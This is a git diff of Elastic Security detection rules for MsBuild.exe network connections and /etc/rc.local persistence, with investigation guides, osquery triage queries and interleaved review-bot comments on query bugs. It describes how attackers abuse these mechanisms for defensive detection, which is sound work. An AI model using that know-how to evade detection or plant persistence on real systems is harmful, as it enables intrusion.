@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "MsBuild Making Network Connections", - "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json
new file mode 100644
index 00000000000..bd1505e70d2
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_106.json
@@ -0,0 +1,95 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies MsBuild.exe making outbound network connections. This may indicate adversarial activity as MsBuild is often leveraged by adversaries to execute code and evade detection.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "MsBuild Making Network Connections",
+ "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\", \"localhost\")]\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1127",
+ "name": "Trusted Developer Utilities Proxy Execution",
+ "reference": "https://attack.mitre.org/techniques/T1127/",
+ "subtechnique": [
+ {
+ "id": "T1127.001",
+ "name": "MSBuild",
+ "reference": "https://attack.mitre.org/techniques/T1127/001/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ 
"version": 106
+ },
+ "id": "0e79980b-4250-4a50-a509-69294c14e84b_106",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json
index b2c8055a0a7..c3784a6da73 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_1.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json
index 7fc0b7da10b..0acd69d4459 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_103.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json
index 109fe689b13..135931a0e24 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_104.json
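Review bot: The `"localhost"` literal added to the `cidrmatch` call on the `query` line of the new 0e79980b..._106.json is a hostname, not an IP address or CIDR block, so it can never match a `destination.ip` value; depending on how EQL validates `cidrmatch` arguments it is either a silent no-op or a query error when the rule is enabled, which is worth confirming before this version ships. Versions 104 and 105 of the same rule, visible earlier in this diff, use `not cidrmatch(destination.ip, "127.0.0.1", "::1")]`, which already expresses the loopback exclusion; I would keep that form, or, if the intent was to exclude all loopback traffic, replace the literal with a proper CIDR such as `"127.0.0.0/8"`. Everything else in the file is identical to the previous version apart from the `version` bump, so the changelog entry should arguably mention the query change rather than only "Release security rules update".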
@@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. 
\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not file.extension : \"swp\"\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
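Review bot: The `Osquery - Retrieve rc-local.service File Information` query on the new side of the `note` checks the same path twice — both sides of the `OR` are `/run/systemd/generator/multi-user.target.wants/rc-local.service` — while the bullet above it tells the analyst to inspect `/lib/systemd/system/rc-local.service` as well, so that unit file is never actually queried; the first disjunct should read `path = '/lib/systemd/system/rc-local.service'`. The syslog check in the same note, `sudo cat /var/log/syslog | grep "rc-local.service|/etc/rc.local Compatibility"`, uses `|` as an alternation without `-E`, so a basic-regex grep matches the literal string and returns nothing even when the service ran; `grep -E` would make the command do what the surrounding sentence promises. The commit only re-serializes `\u003e` and `\u0026` as `>` and `&`, so this is pre-existing guide text carried forward, and the fix likely belongs in the upstream rule source rather than in this generated bundle. The identical `note` string appears in the _105 hunk (ending at its `references` line before `@@ -75`) and in the _106 hunk, which runs past the end of this view.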
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json
index 5b4460f8cb3..df8a66b2cf4 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_105.json
@@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
